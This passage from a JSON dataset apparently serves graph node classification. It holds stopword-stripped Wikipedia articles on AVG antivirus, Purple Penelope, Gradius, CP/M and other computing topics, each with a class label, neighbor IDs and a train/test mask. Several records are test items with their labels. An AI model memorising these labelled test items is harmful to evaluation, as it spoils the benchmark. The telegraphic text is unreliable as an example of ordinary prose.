antivirus revealed contain multiple critical security vulnerabilities notably chrome users browsing history could exposed website cookies site user visited could read attacker trivial cross-site scripting xss issues could allow website execute arbitrary code another domain xss vulnerability allowed user mail mail.google.com read website financial information read user online banking site avg team fixed allowing mysearch.avg.com webtuneup.avg.com execute scripts despite remediation attackers could leverage attacks xss vulnerability found avg sites april 2016 web tuneup still available download avg website avg antivirus free 2012 selected pc magazine editors choice free antivirus category avg antivirus free 2015 received editor choice badge softchamp",
    "neighbors": [
      4480,
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      9121,
      11299,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      3885,
      6699,
      7983,
      8615,
      9771,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      3395,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      7886,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      4198,
      11622,
      8171,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 4404,
    "label": 4,
    "text": "Purple_Penelope:purple penelope purple penelope demonstration secure system created defence research agency dra uk aim show security functionality windows nt could extended support users handling classified information purple penelope implemented domain based security model developed uk ministry defence dra take advantage using commercial shelf cots software implement secure systems within security domain access controls designed stop users accessing material without need-to-know prevent making mistakes handling classified data controls sharing information security domains stringent defend attacks hold users account actions model calls discretionary security labelling role based access controls within domain user-sanctioned release information domain coupled application oriented accounting audit purple penelope extended windows nt microsoft office application suite main features system discretionary labelling trusted path authorising security critical actions discretionary labelling mechanism added security labels files application windows clipboard user desktop display augmented stripe across top screen showed security label application window focus security label clipboard data copied clipboard clipboard label set source application window data copied clipboard destination application window label floated label new data user free change label window clipboard time user also access shared file store files shared file store labelled opened application application window label set file shared file store could written directly application user able copy files shared file store required confirm action using trusted path interface inaccessible applications software created purple penelope project licensed argus systems developed product called deep purple software also laid foundation qinetiq sybard suite product work cross-domain guard led production dera swipsy firewall toolkit purple derived colour associated joint operations uk mod time penelope name wife odysseus tricked suitors weaving burial shroud day unpicking night slow progress thought reflect state secure system development time",
    "neighbors": [
      800,
      10378,
      210,
      10034,
      10580,
      6902,
      3930
    ],
    "mask": "Test"
  },
  {
    "node_id": 4405,
    "label": 3,
    "text": "Gradius_(video_game):gradius video game arcade version gradius released internationally outside japan title nemesis although subsequent home releases original title home versions released various platforms nes msx home computer pc engine player controls trans-dimensional spaceship vic viper must battle waves enemies various environments game became synonymous phrase destroy core standard boss battles gradius series involved combat giant craft center would situated one several blue colored spheres bosses would designed way would straight passage exterior giant craft leads directly one cores player must fire shots passage avoiding attack patterns weapon emplacements body boss however small destructible walls situated passage impeding bullet shots damaging core must whittled away repeated well-placed shots way tiny walls represent boss shielding gauge core finally vulnerable attack bosses ability regenerate walls core sustained enough hits usually changes color blue red indicating critical condition destruction imminent upon destruction core piece boss may put commission seeing longer powered core cores destroyed entire boss defeated explodes satisfyingly note cores present organic bosses gradius bosses weak spots places mouth head eye gameplay begins vic viper relatively slow weak gun level capability generally insufficient engaging enemies vic viper gain greater capabilities collecting using power-up items arcade games utilize distinct power up-items correspond specific effect player character gradius single power-up item effect power-up item advance currently selected item power-up menu appears bottom screen desired power-up highlighted player obtain pressing power-up button returning menu initial state power-up highlighted development gradius began series creator hiroyasu machiguchi given team work asked kind game wanted develop response shoot 'em intent surpassing namco xevious made horizontal shooting game wanted reuse material scramble much possible originally naming game scramble 2 development lasted year refining experimenting gameplay team originally tried twenty different movement patterns options used process elimination something work story hiroyasu team inspired science fiction movies popular sci-fi films time star wars anime adaptations lensman team saw lensman together influenced game story plasma laser impressed gradius features laser weapon moai included add mysterious element game like xevious nazca lines gradius first released japan konami bubble system arcade board allows operators change software used proprietary magnetic-based media called bubble software game distributed standard printed circuit board north america europe title nemesis north american version nemesis features considerably increased difficulty compared japanese european version balance game spawns fleet orange enemies player loses life order provide many power-up capsules possible order recover many upgrades possible title screen also updated showing in-game reproduction promotional artwork behind logo first home conversion gradius released nintendo famicom console april 25 1986 japan due hardware limitations famicom many level designs simplified moai stage example lacks vertical scrolling present arcade game maximum amount options player upgrade reduced four two version added cheat code entered game paused grants player ship almost power-ups code would appear many later konami nes consoles contra life force becoming known konami code nes version gradius released north america december 1986 first nes game released konami region unlike original arcade game title kept unchanged regions nes version produced arcades nintendo vs. system board title vs. gradius well playchoice 10 cabinet msx version gradius released july 25 1986 japan months famicom version also released europe nemesis title version underwent changes similar famicom version adds slew exclusive content make downgrade new stage bone planet added inverted volcano stage antennoid stage featuring exclusive enemy types also four hidden warp zones ability play titular ship twinbee msx version game played alongside nemesis pc engine version gradius released november 15 1991 exclusively japan released 2-megabit hucard relatively omissions compared nes msx versions added desert planet stage similar bone planet stage msx version lower resolution pc engine compared original arcade hardware pc engine features slight vertical-scrolling addition msx gradius also ported microcomputers shortly release zx spectrum amstrad cpc commodore 64 europe nemesis final challenge well nec pc-8801 sharp x1 japan port x68000 computer also included early models computer original gradius also included collection gradius deluxe pack playstation sega saturn gradius collection playstation portable arcade version digitally released playstation 4 part arcade archives series option play four regional variants game game went number 2 uk sales charts behind feud western cover art nes version claimed sold one million copies japan gamespot stated gradius one toughest side-scrolling shooter games available nes second contra ign given game rating 7 10 re-release wii virtual console hailed one greatest classic side-scrolling shooter games gradius spawned several sequels first 1986 salamander series continued seventh generation gradius rebirth also re-released windows store december 20 2013 gamenow may 2014 playstation 4 arcade archives january 25 japan nes port re-released nintendo switch online september 19 2018 worldwide update release november 14 2018 worldwide",
    "neighbors": [
      2498,
      9005,
      6797,
      9006,
      10931,
      10900,
      11380,
      9303,
      7610,
      9247
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4406,
    "label": 2,
    "text": "Package_(macOS):package macos apple macos operating system package file system directory normally displayed user finder single file directory may top-level directory tree objects stored files may archives files objects various purposes installer packages backup archives package common file system abstraction used apple operating systems macos ios directory may contain hierarchy files objects represent preserved organized state package displayed users like single file finder application avoid changed user however content packages may accessed special keyboard mouse combination events purpose control-click right-click menu displays directive show package contents documents may represented packages uniform type identifier uti package com.apple.package package standardized structure storing executable code associated resources called bundle",
    "neighbors": [
      9988,
      10765,
      1940,
      3222,
      3114,
      811,
      2095,
      10817,
      2755,
      11076,
      3659,
      10317,
      4174,
      4561,
      722,
      2389,
      3804,
      5096,
      10857,
      8940,
      10221,
      237,
      4845,
      10478,
      7422
    ],
    "mask": "None"
  },
  {
    "node_id": 4407,
    "label": 2,
    "text": "BoundsChecker:boundschecker boundschecker memory checking api call validation tool used c++ software development microsoft visual c++ created numega early 1990s numega purchased compuware 1997 boundschecker became part larger tool suite devpartner studio micro focus purchased product line compuware 2009 comparable tools include purify insure++ valgrind boundschecker may run two distinct modes activecheck work application finalcheck makes use instrumentation added application built activecheck performs less intrusive analysis monitors calls application c runtime library windows api calls com objects monitoring memory allocations releases detect memory leaks overruns monitoring api com calls enables activecheck check parameters returns exceptions report exceptions occur thread deadlocks also detected monitoring synchronization objects calls giving actual potential deadlock detection finalcheck requires instrumented build gives much deeper intrusive analysis provides detection features activecheck plus ability detect buffer overflows read write uninitialized memory accesses monitors every scope change tracks pointers referencing memory objects api calls monitored input parameters verified function calls actually performed warning possible problems api return codes also monitored error codes logged validation limited apis known boundschecker currently several thousand number memory tracking enabled api call validation make use information gathered precise validation memory pointers memory tracking api validation enabled becomes possible detect many kinds array buffer overrun conditions compiler instrumentation enhances ability feature product originally named api com method .net interop function calls logged detail noting call parameter values resulting return values feature limited value non-trivial applications often result session log quickly becoming large report generated analyzing .net interop garbage collection finalizer activity life process test certain kinds deadly embraces lockups detected current version 11.4.2898 boundschecker supports 32-bit 64-bit native applications windows xp windows 10 2019 spring update ms-dos 16-bit windows windows 2000 applications longer supported part devpartner studio product integrates visual studio 2005 sp1 2008 sp1 2010 sp1 2012 update 4 2013 update 4 2015 update 3 2017 update 15.9.11 2019 update 16.0.3 may 2019 deadlock analysis feature yet supported x64 applications",
    "neighbors": [
      1730,
      1474,
      3048,
      814,
      815,
      7983,
      5754
    ],
    "mask": "Test"
  },
  {
    "node_id": 4408,
    "label": 4,
    "text": "Host_protected_area:host protected area host protected area hpa area hard drive solid-state drive normally visible operating system first introduced ata-4 standard cxv t13 2001 ide controller registers contain data queried using ata commands data returned gives information drive attached controller three ata commands involved creating using host protected area commands operating systems use identify device command find addressable space hard drive identify device command queries particular register ide controller establish size drive register however changed using set max address ata command value register set less actual hard drive size effectively host protected area created protected os work value register returned identify device command thus normally unable address parts drive lie within hpa hpa useful software firmware e.g bios able use software firmware able use hpa referred 'hpa aware ata command entities use called read native max address command accesses register contains true size hard drive use area controlling hpa-aware program changes value register read identify device found register read read native max address operations complete register read identify device returned original fake value identification hpa hard drive achieved number tools methods note hpa feature hidden dco commands documentation states hpa use frozen next power-down hard disk password protected windows program atatool detect hpa instance see first disk hpa use command using linux various ways detect existence hpa recent versions linux print message system booting hpa detected example program hdparm versions 8.0 detect hpa drive sdx invoked parameters versions hdparm 8 one compare number sectors output 'hdparm -i number sectors reported hard drive model published statistics windows program atatool used create hpa instance create 10gb hpa linux program hdparm version 8.0 create hpa invoked parameters sdx target drive number non-hpa visible sectors",
    "neighbors": [
      3841,
      7525,
      9319,
      11368,
      1515,
      11182,
      2447,
      7983,
      1873,
      2226,
      9086,
      823,
      1400,
      3323,
      2494,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 4409,
    "label": 2,
    "text": "CP/M:cp/m cp/m originally standing control program/monitor later control program microcomputers mass-market operating system created 1974 intel 8080/85-based microcomputers gary kildall digital research inc initially confined single-tasking 8-bit processors 64 kilobytes memory later versions cp/m added multi-user variations migrated 16-bit processors combination cp/m s-100 bus computers loosely patterned mits altair early standard microcomputer industry computer platform widely used business late 1970s mid-1980s cp/m increased market size hardware software greatly reducing amount programming required install application new manufacturer computer important driver software innovation advent comparatively low-cost microcomputers running cp/m independent programmers hackers bought shared creations user groups cp/m displaced dos soon 1981 introduction ibm pc minimal 8-bit cp/m system would contain following components hardware system cp/m sold digital research would support intel 8080 development system manufacturers cp/m-compatible systems customized portions operating system combination installed memory disk drives console devices cp/m would also run systems based zilog z80 processor since z80 compatible 8080 code digital research distributed core cp/m bdos ccp core transient commands use z80-specific instructions many z80-based systems used z80 code system-specific bios many applications dedicated z80-based cp/m machines machines bootstrap minimal bootloader rom combined means minimal bank switching means injecting code bus since 8080 needs see boot code address 0 start-up cp/m needs ram others bootstrap entered memory using front-panel controls time system started cp/m used 7-bit ascii set 128 characters made possible 8-bit byte standardized example one kaypro used greek characters osborne machines used 8th bit set indicate underlined character wordstar used 8th bit end-of-word marker international cp/m systems commonly used iso 646 norm localized character sets replacing certain ascii characters localized characters rather adding beyond 7-bit boundary 8-bit versions running cp/m operating system loaded memory three components bios bdos memory-resident ccp memory-resident unless overwritten application case automatically reloaded application finished running number transient commands standard utilities also provided transient commands resided files extension .com disk bios directly controlled hardware components cpu main memory contained functions character input output reading writing disk sectors bdos implemented cp/m file system input/output abstractions redirection top bios ccp took user commands either executed directly internal commands dir show directory era delete file loaded started executable file given name transient commands pip.com copy files stat.com show various file system information third-party applications cp/m also essentially transient commands bdos ccp standard transient commands ideally installations particular revision cp/m bios portion always adapted particular hardware adding memory computer example meant cp/m system reinstalled updated bios capable addressing additional memory utility provided patch supplied bios bdos ccp allow run higher memory installed operating system bios bdos ccp stored reserved areas beginning disk would used boot system start-up bootloader usually contained rom firmware chip would load operating system disk drive codice_1 modern standards cp/m primitive owing extreme constraints program size version 1.0 provision detecting changed disk user changed disks without manually rereading disk directory system would write new disk using old disk directory information ruining data stored disk version 1.1 1.2 onwards changing disk trying write directory read would cause fatal error signalled avoided overwriting disk required reboot loss data stored disk majority complexity cp/m isolated bdos lesser extent ccp transient commands meant porting limited number simple routines bios particular hardware platform entire os would work significantly reduced development time needed support new machines one main reasons cp/m widespread use today sort abstraction common oss hardware abstraction layer time cp/m birth oss typically intended run one machine platform multilayer designs considered unnecessary console command processor ccp accepted input keyboard conveyed results terminal cp/m would work either printing terminal video terminal cp/m commands typed command line console would often display codice_2 prompt indicate current default disk drive used video terminal would usually followed blinking cursor supplied terminal ccp would await input user ccp internal command form drive letter followed colon could used select default drive example typing codice_3 pressing enter command prompt would change default drive b command prompt would become codice_4 indicate change cp/m command-line interface patterned operating systems digital equipment rt-11 pdp-11 os/8 pdp-8 commands took form keyword followed list parameters separated spaces special characters similar unix shell builtin internal command recognized carried ccp otherwise would attempt find executable file currently logged disk drive later versions user area load pass additional parameters command line referred transient programs completion cp/m would reload part ccp overwritten application programs — allowed transient programs larger memory space commands could sometimes obscure instance command duplicate files named codice_5 peripheral-interchange-program name old dec utility used purpose format parameters given program standardized single option character differentiated options file names different programs could use different characters following list built-in commands supported cp/m console command processor transient commands cp/m include cp/m plus cp/m version 3 includes following built-in commands basic disk operating system bdos provided access operations opening file output console printing application programs would load processor registers function code operation addresses parameters memory buffers call fixed address memory since address independent amount memory system application programs would run way type configuration hardware basic input output system bios provided lowest level functions required operating system included reading writing single characters system console reading writing sector data disk bdos handled buffering data diskette cp/m 3.0 assumed disk sector size fixed 128 bytes used single-density 8-inch floppy disks since 5.25-inch disk formats used larger sectors blocking deblocking management disk buffer area handled model-specific code bios customization required hardware choices constrained compatibility one popular standard example manufacturers used separate computer terminal others designed built-in integrated video display system serial ports printers modems could use different types uart chips port addresses fixed machines used memory-mapped i/o instead 8080 i/o address space variations hardware concealed modules system use bios used standard entry points services required run cp/m character i/o accessing disk block since support serial communication modem rudimentary bios may absent altogether common practice cp/m programs used modems user-installed overlay containing code required access particular machine serial port file names specified string eight characters followed period followed file name extension three characters 8.3 filename format extension usually identified type file example codice_6 indicated executable program file codice_7 indicated file containing ascii text disk drive identified drive letter example drive codice_8 drive codice_9 refer file specific drive drive letter prefixed file name separated colon e.g codice_10 drive letter prefixed access files current default drive 8.3 filename format drive letter colon combination survived ms-dos drive letter colon convention survived microsoft windows still used today addition file extensions example codice_11 codice_12 compiled file codice_13 executable file still used identify file types many operating systems file size specified number 128 byte records directly corresponding disk sectors 8-inch drives occupied file disk generally supported way specifying byte-exact file sizes current size file maintained file file control block fcb operating system since many application programs text editors prefer deal files sequences characters rather sequences records convention text files terminated control-z character ascii sub hexadecimal 1a determining end text file therefore involved examining last record file locate terminating control-z also meant inserting control-z character middle file usually effect truncating text contents file advent larger removable fixed disk drives disk de-blocking formulas employed resulted disk blocks per logical file allocation block allowed larger file sizes also meant smallest file could allocated increased size 1 kb single-density drives 2 kb double-density drives 32 kb file containing single byte made inefficient use disk space disk contained large number small files file modification time stamps supported releases cp/m 2.2 optional feature mp/m cp/m 3.0 cp/m 2.2 subdirectories file structure provided 16 numbered user areas organize files disk change user one simply type user x command prompt x number user wanted security non-existent believed necessary user area concept make single-user version cp/m somewhat compatible multi-user mp/m systems common patch cp/m derivative operating systems make one user area accessible user independent currently set user area user command allowed user area changed area 0 15 user 0 default one changed another user user 1 material saved disk user would available user 1 user 2 would able see access however files stored user 0 area accessible users location specified prefatory path since files user 0 visible someone logged user 0 user area feature arguably little utility small floppy disks useful organizing files machines hard drives intent feature ease use computer different tasks example secretary could data entry switching user areas another employee could use machine billing without files intermixing read/write memory address 0100 hexadecimal lowest address bdos transient program area tpa available cp/m application programs although z80 8080 processors could address 64 kilobytes memory amount available application programs could vary depending design particular computer computers used large parts address space things bios roms video display memory result systems tpa memory available others bank switching common technique allowed systems large tpa switching rom video memory space needed cp/m 3.0 allowed parts bdos bank-switched memory well cp/m came dynamic debugging tool nicknamed ddt insecticide i.e bug-killer allowed memory program modules examined manipulated allowed program executed one step time cp/m originally support equivalent terminate stay resident program dos programmers could write software could intercept certain operating system calls extend alter functionality using capability programmers developed sold auxiliary desk accessory programs smartkey keyboard utility assign string bytes key cp/m 3 however added support dynamically loadable resident system extensions rsx similar solutions like rsm also retrofitted cp/m 2.2 systems third-parties although cp/m provided hardware abstraction standardize interface disk i/o console i/o typically application programs still required installation make use features equipment printers terminals often controlled escape sequences altered different devices example escape sequence select bold face printer would differed among manufacturers sometimes among models within manufacturer range procedure defined operating system user would typically run installation program would either allow selection range devices else allow feature-by-feature editing escape sequences required access function repeated application program since central operating system service provided devices initializing codes model printer written application use program wordstar one printer say fast dot matrix printer slower presentation-quality daisy wheel printer separate version wordstar prepared one load wordstar version corresponded printer selected exiting reloading change printers gary kildall originally developed cp/m 1974 operating system run intel intellec-8 development system equipped shugart associates 8-inch floppy disk drive interfaced via custom floppy disk controller written kildall pl/m programming language microcomputers various aspects cp/m influenced tops-10 operating system decsystem-10 mainframe computer kildall used development environment cp/m originally stood control program/monitor name implies resident monitor—a primitive precursor operating system however conversion cp/m commercial product trademark registration documents filed november 1977 gave product name control program microcomputers cp/m name follows prevailing naming scheme time kildall pl/m language prime computer pl/p programming language prime suggesting ibm pl/i ibm cp/cms operating system kildall used working naval postgraduate school renaming cp/m part larger effort kildall wife/business partner convert kildall personal project cp/m intel-contracted pl/m compiler commercial enterprise kildalls intended establish digital research brand product lines synonymous microcomputer consumer mind similar ibm microsoft together later successfully accomplished making personal computer synonymous product offerings intergalactic digital research inc. later renamed via corporation change-of-name filing digital research inc. september 1981 digital research sold cp/m licenses infoworld stated actual market likely larger sublicenses many different companies produced cp/m-based computers many different markets magazine stated cp/m well way establishing small-computer operating system companies chose support cp/m large library software xerox 820 ran operating system literally thousands programs written would unwise take advantage xerox said xerox included howard w. sams cp/m manual compensation digital research documentation infoworld 1982 described atrocious 1984 columbia university used source code build kermit binaries dozen different cp/m systems plus generic version operating system described software bus allowing multiple programs interact different hardware standardized way programs written cp/m typically portable among different machines usually requiring specification escape sequences control screen printer portability made cp/m popular much software written cp/m operating systems ran one brand hardware one restriction portability certain programs used extended instruction set z80 processor would operate 8080 8085 processor another graphics routines especially games graphics programs generally machine-specific used direct hardware access speed bypassing os bios also common problem early dos machines bill gates claimed apple ii family z-80 softcard single most-popular cp/m hardware platform many different brands machines ran operating system notable examples altair 8800 imsai 8080 osborne 1 kaypro luggables msx computers best-selling cp/m-capable system time probably amstrad pcw uk cp/m also available research machines educational computers cp/m source code published educational resource bbc micro equipped z80 co-processor furthermore available amstrad cpc series commodore 128 trs-80 later models zx spectrum cp/m 3 also used niat custom handheld computer designed a.c. nielsen internal use 1 mb ssd memory wordstar one first widely used word processors dbase early popular database program microcomputers originally written cp/m two early outliners kamas knowledge mind amplification system cut-down successor out-think without programming facilities retooled 8080/v20 compatibility also written cp/m though later rewritten ms-dos turbo pascal ancestor borland delphi multiplan ancestor microsoft excel also debuted cp/m ms-dos versions became available visicalc first-ever spreadsheet program made available cp/m another company sorcim created supercalc spreadsheet cp/m would go become market leader de facto standard cp/m supercalc would go competitor spreadsheet market ms-dos world autocad cad application autodesk debuted cp/m host compilers interpreters popular programming languages time basic borland turbo pascal fortran available among several earliest microsoft products cp/m software often came installers adapted wide variety computers source code basic programs easily accessible forms copy protection ineffective operating system kaypro ii owner example would obtain software xerox 820 format copy run kaypro-format disks lack standardized graphics support limited video games various character text-based games ported telengard gorillas hamurabi lunar lander along early interactive fiction including zork series colossal cave adventure text adventure specialist infocom one publishers consistently release games cp/m format lifeboat associates started collecting distributing user-written free software one first xmodem allowed reliable file transfers via modem phone line another program native cp/m outline processor kamas ibm system/34 ibm 3740 single-density single-sided format cp/m standard 8-inch floppy disk format standard 5.25-inch cp/m disk format exists kaypro morrow designs osborne others using infoworld estimated september 1981 two dozen formats popular enough software creators consider reach broadest possible market jrt pascal example provided versions 5.25-inch disk north star osborne apple heath hard sector soft sector superbrain one 8-inch version ellis computing also offered software heath formats 16 5.25-inch formats including two different trs-80 cp/m modifications certain disk formats popular others software available xerox 820 format computers kaypro ii compatible single manufacturer however prevailed 5.25-inch era cp/m use disk formats often portable hardware manufacturers software manufacturer prepare separate version program brand hardware run manufacturers kaypro example even standardization across company different models situation disk format translation programs allowed machine read many different formats became popular reduced confusion programs like kermit allowed transfer data programs one machine another using serial ports cp/m machines various formats used depending characteristics particular systems degree choices designers cp/m supported options control size reserved directory areas disk mapping logical disk sectors seen cp/m programs physical sectors allocated disk many ways customize parameters every system set standardized way existed system load parameters disk formatted another system degree portability different cp/m machines depended type disk drive controller used since many different floppy types existed cp/m era 8-inch 5.25-inch format disks could hard soft sectored single double density single double sided 35 track 40 track 77 track 80 track sector layout size interleave could vary widely well although translation programs could allow user read disk types different machines also depended drive type controller 1982 soft sector single sided 40 track 5.25-inch disks become popular format distribute cp/m software used common consumer-level machines time apple ii trs-80 osborne 1 kaypro ii ibm pc translation program allowed user read disks machine similar format—for example kaypro ii could read trs-80 osborne ibm pc epson disks disk types 80 track hard sectored completely impossible read first half double sided disks like epson qx-10 could read cp/m accessed disk tracks sequentially track 0 first outermost track side 1 track 79 40 track disk last innermost track side 2 apple ii users could use anything apple gcr format obtain cp/m software apple format disks else transfer via serial link fragmented cp/m market requiring distributors either stock multiple formats disks invest multiformat duplication equipment compared standardized ibm pc disk formats contributing factor rapid obsolescence cp/m 1981 one last notable cp/m capable machines appear commodore 128 1985 z80 cp/m support addition native mode using 6502-derivative cpu using cp/m required either 1571 1581 disk drive could read soft sector 40 track mfm format disks first computer use 3.5-inch floppy drive sony smc-70 ran cp/m 2.2 commodore 128 bondwell-2 laptop micromint/ciarcia sb-180 msx trs-80 model 4 running montezuma cp/m 2.2 also supported use cp/m 3.5-inch floppy disks amstrad pcw ran cp/m using 3 inch floppy drives first later switched 3.5 inch drives although graphics-capable s-100 systems existed commercialization s-100 bus cp/m provide standardized graphics support 1982 gsx graphics system extension owing small memory available graphics never common feature associated 8-bit cp/m operating systems systems could display rudimentary ascii art charts diagrams text mode using custom character set computers kaypro line trs-80 model 4 video hardware supporting block graphics characters accessible assembler programmers basic programmers using chr command model 4 could display 640 240 pixel graphics optional high resolution board 1979 multi-user compatible derivative cp/m released mp/m allowed multiple users connect single computer using multiple terminals provide user screen keyboard later versions ran 16-bit processors last 8-bit version cp/m version 3 often called cp/m plus released 1983 incorporated bank switching memory management mp/m single-user single-task operating system compatible cp/m 2.2 applications cp/m 3 could therefore use 64 kb memory 8080 z80 processor system could configured support date stamping files operating system distribution software also included relocating assembler linker cp/m 3 available last generation 8-bit computers notably amstrad pcw amstrad cpc zx spectrum +3 commodore 128 msx machines radio shack trs-80 model 4 versions cp/m 16-bit cpus well first version 16-bit family cp/m-86 intel 8086 soon followed cp/m-68k motorola 68000 original version cp/m-68k 1982 written pascal/mt+68k ported c later point original 8-bit cp/m became known retronym cp/m-80 avoid confusion ca 1982/1983 also port zilog z8000 olivetti m20 written c named cp/m-8000 cp/m-86 expected standard operating system new ibm pcs dri ibm unable negotiate development licensing terms ibm turned microsoft instead microsoft delivered pc dos based 86-dos although cp/m-86 became option ibm pc dri threatened legal action never overtook microsoft system customers repelled significantly greater price ibm charged cp/m-86 pc dos digital equipment corporation dec put rainbow 100 compete ibm came cp/m-80 using z80 chip cp/m-86 ms-dos using 8088 microprocessor cp/m-86/80 using z80 8088 cpus ran concurrently benefit rainbow could continue run 8-bit cp/m software preserving user possibly sizable investment moved 16-bit world ms-dos cp/m-68k already running motorola exormacs systems initially used atari st computer atari decided go newer disk operating system called gemdos cp/m-68k also used sord m68 m68mx computers 16-bit versions cp/m required application programs re-compiled new cpus written assembly language translated using tools like digital research xlt86 program written gary kildall 1981 translated .asm source code intel 8080 processor .a86 source code intel 8086 using global data flow analysis 8080 register usage translator would also optimize output code size take care calling conventions cp/m-80 mp/m-80 programs could ported cp/m-86 mp/m-86 platforms automatically xlat86 written pl/i-80 available cp/m-80 platforms well dec vms vax 11/750 11/780 many expected cp/m would standard operating system 16-bit computers 1980 ibm approached digital research bill gates suggestion license forthcoming version cp/m new product ibm personal computer upon failure obtain signed non-disclosure agreement talks failed ibm instead contracted microsoft provide operating system resulting product ms-dos soon began outselling cp/m many basic concepts mechanisms early versions ms-dos resembled cp/m internals like file-handling data structures identical referred disk drives letter codice_1 codice_3 etc. ms-dos main innovation fat file system similarity made easier port popular cp/m software like wordstar dbase however cp/m concept separate user areas files disk never ported ms-dos since ms-dos access memory ibm pcs sold less 64 kb memory cp/m could run 16 kb necessary commands built command-line shell making ms-dos somewhat faster easier use floppy-based computers although one first peripherals ibm pc softcard-like expansion card let run 8-bit cp/m software cp/m rapidly lost market share microcomputing market moved ibm-compatible platform never regained former popularity byte magazine time one leading industry magazines microcomputers essentially ceased covering cp/m products within years introduction ibm pc example 1983 still advertisements s-100 boards articles cp/m software 1987 longer found magazine 1984 article infoworld stated efforts introduce cp/m home market largely unsuccessful cp/m software expensive home users 1986 stated kaypro stopped production 8-bit cp/m-based models concentrate sales ms-dos compatible systems long vendors ceased production new equipment software cp/m later versions cp/m-86 made significant strides performance usability made compatible ms-dos reflect compatibility name changed cp/m-86 became dos plus turn became dr-dos zcpr z80 command processor replacement introduced 2 february 1982 drop-in replacement standard digital research console command processor ccp initially written group computer hobbyists called ccp group frank wancho keith petersen archivist behind simtel time ron fowler charlie strom bob mathias richard conn. richard fact driving force group maintained contact email zcpr1 released disk put sig/m special interest group/microcomputers part amateur computer club new jersey zcpr2 released 14 february 1983 released set ten disks sig/m zcpr2 upgraded 2.3 also released 8080 code permitting use zcpr2 8080 8085 systems zcpr3 released bastille day 14 july 1984 set nine disks sig/m code zcpr3 could also compiled reduced features 8080 would run systems requisite z80 microprocessor january 1987 richard conn stopped developing zcpr echelon asked jay sage already privately enhanced zcpr 3.1 continue work thus zcpr 3.3 developed released zcpr 3.3 longer supported 8080 series microprocessors added features upgrade zcpr line features zcpr version 3 included zcpr3.3 also included full complement utilities considerably extended capabilities enthusiastically supported cp/m user base time zcpr alone insufficient slow demise cp/m number cp/m-80 derivatives existed former east-bloc various names including scp scp/m cp/a cp/kc cp/l cp/ksob cp/z microdos bcu880 zoaz os/m tos/m zsdos m/os cos-psa dos-psa csoc csos cz-cpm others also cp/m-86 derivatives named scp1700 cp/k k8918-os produced east-german veb robotron others number behaviors exhibited microsoft windows result backward compatibility ms-dos turn attempted backward compatibility cp/m drive letter 8.3 filename conventions ms-dos early windows versions originally adopted cp/m wildcard matching characters used windows based cp/m reserved filenames used redirect output printer prn console con drive names b used designate two floppy disk drives cp/m systems typically used hard drives appeared designated c survived ms-dos codice_16 command prompt control character ^z marking end text files also attributed cp/m 1997 1998 caldera released cp/m 2.2 binaries source code open source license also allowing redistribution modification collected digital research files related cp/m mp/m families tim olmstead unofficial cp/m web site since 1997 olmstead death 12 september 2001 distribution license refreshed expanded lineo meanwhile become owner digital research assets 19 october 2001 october 2014 mark 40th anniversary first presentation cp/m computer history museum released early source code versions cp/m number active vintage hobby retro-computer people groups small commercial businesses still developing supporting compute platforms use cp/m mostly 2.2 host operating system",
    "neighbors": [
      2560,
      3075,
      4614,
      2055,
      6152,
      6155,
      10257,
      4114,
      3091,
      532,
      6675,
      22,
      7187,
      7188,
      25,
      8729,
      9751,
      8732,
      4637,
      2078,
      10776,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      4150,
      9784,
      10809,
      576,
      577,
      2625,
      8262,
      8774,
      4170,
      4684,
      6221,
      5711,
      3160,
      7771,
      10333,
      97,
      1121,
      6242,
      5220,
      7269,
      11363,
      6760,
      9320,
      8298,
      9835,
      10856,
      8301,
      2672,
      625,
      9329,
      627,
      7795,
      7285,
      9840,
      4727,
      2168,
      9335,
      634,
      1147,
      6778,
      3197,
      1150,
      5247,
      8831,
      11390,
      2179,
      4228,
      2181,
      10883,
      10891,
      6797,
      10382,
      7823,
      3216,
      9363,
      9366,
      6296,
      2201,
      9370,
      7323,
      9882,
      7325,
      9887,
      4257,
      7847,
      2729,
      1194,
      7849,
      8876,
      5293,
      8879,
      3248,
      689,
      178,
      9907,
      6837,
      11447,
      6329,
      8889,
      6843,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      1750,
      7382,
      8410,
      9947,
      9436,
      1247,
      11489,
      2786,
      1253,
      7403,
      8429,
      5359,
      4337,
      242,
      4850,
      5363,
      11513,
      9466,
      2811,
      3323,
      9468,
      1278,
      8959,
      11008,
      3841,
      10499,
      6921,
      780,
      1804,
      1805,
      9998,
      11021,
      273,
      8977,
      787,
      3860,
      789,
      5397,
      7959,
      2840,
      11539,
      10016,
      6434,
      9507,
      292,
      10018,
      10235,
      2345,
      11562,
      8494,
      7983,
      9006,
      5425,
      2355,
      7477,
      8502,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      11076,
      4423,
      7495,
      8521,
      5452,
      6988,
      5457,
      8529,
      7507,
      10067,
      9557,
      11601,
      7511,
      2395,
      8540,
      9563,
      10590,
      1376,
      3426,
      6498,
      10083,
      8551,
      5484,
      7020,
      7536,
      11635,
      5492,
      2933,
      376,
      8059,
      8573,
      1919,
      2432,
      6529,
      1922,
      7039,
      8063,
      8069,
      10113,
      394,
      3978,
      4492,
      7057,
      11666,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      7591,
      4521,
      9643,
      4525,
      11184,
      7601,
      8115,
      10676,
      6075,
      6078,
      3007,
      9151,
      5569,
      4548,
      11204,
      11205,
      4040,
      8136,
      9166,
      477,
      1501,
      2534,
      10730,
      1515,
      10731,
      8687,
      3056,
      5105,
      6128,
      3571,
      5619,
      6129,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 4410,
    "label": 9,
